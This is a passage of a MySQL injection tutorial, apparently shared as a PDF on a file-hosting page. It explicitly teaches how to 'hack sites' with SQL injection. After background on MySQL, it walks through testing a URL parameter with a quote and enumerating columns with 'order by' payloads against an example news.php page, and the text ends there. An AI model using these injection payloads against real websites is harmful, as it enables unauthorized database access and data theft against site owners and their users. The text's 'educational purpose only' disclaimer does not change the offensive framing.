SQL Injection attacks and tutorials by Exploit DB.pdf

(327 KB) Pobierz
SQL INJECTION TUTORIAL
A Tutorial on my-sql
Author:- Prashant a.k.a t3rm!n4t0r
C0ntact:- happyterminator@gmail.com
Greets to:
-
vinnu, b0nd, fb1h2s,Anarki, Nikhil, D4Rk357, Beenu
Special Greets to: - Hackers Garage Crew and r45c41
INTRODUCTION
This tutorial will give you a basic idea on how to hack sites with MySQL
injection vulnerability. MySQL database is very common these days and
follows by much vulnerability☺. Here we will discuss how to exploit those
vulnerabilities manually without any sqli helper etc
NOTE: - INTENDED FOR EDUCATIONAL PURPOSE ONLY. THE
AUTHOR WONT BE HELD RESPONSIBLE FOR THE MISUSE OF
THIS ARTICLE.
MySQL
is a relational database management system (RDBMS) that runs as
a server providing multi-user access to a number of databases. MySQL is
officially pronounced /ma
skju
l/ ("My S-Q-L") but is often
pronounced /ma si kwəl/ ("My Sequel"). It is named for original developer
Michael Widenius's daughter my.
The MySQL development project has made its source code available under
the terms of the GNU General Public License, as well as under a variety of
proprietary agreements. MySQL is owned and sponsored by a single for-
profit firm, the Swedish company MySQL AB, now owned by Sun
Microsystems, a subsidiary of Oracle Corporation.
Members of the MySQL community have created several forks such as
Drizzle, OurDelta, Percona Server, and MariaDB. All of these forks were in
progress before the Oracle acquisition (Drizzle was announced 8 months
before the Sun acquisition).
Free-software projects that require a full-featured database management
system often use MySQL. Such projects include (for example) WordPress,
phpBB, Drupal and other software built on the LAMP software stack.
MySQL is also used in many high-profile, large-scale World Wide Web
products including Wikipedia and Facebook.
So lets start with how to exploit the MySQL injection vulnerability
We
will try to get some useful information from sql injection
THE VERY FIRST STEP: CHECKING FOR VULNEARBILITY
Suppose we have website like this:-
http://www.site.com/news.php?id=7
To test this URL, we add a quote to it ‘
http://www.site.com/news.php?id=7’
On executing it, if we get an error like this: "You have an error in your SQL
syntax; check the manual that corresponds to your MySQL server version
for the right etc..."Or something like that, that means the target is vulnerable
to sql injection
FINDING THE COLUMNS
To find number of columns we use statement ORDER BY (tells database
how to order the result). In order to use, we do increment until we get an
error. Like:
http://www.site.com/news.php?id=7 order by 1/* <-- no error
http://www.site.com/news.php?id=7 order by 2/* <-- no error
http://www.site.com/news.php?id=7 order by 3/* <-- no error
http://www.site.com/news.php?id=7 order by 4/* <-- error (we get message
like this Unknown column '4' in 'order clause' or something like that)
This means that it has 3 columns, cause we got an error on 4.

Plik z chomika:

Inne pliki z tego folderu:

Inne foldery tego chomika:

Zgłoś jeśli naruszono regulamin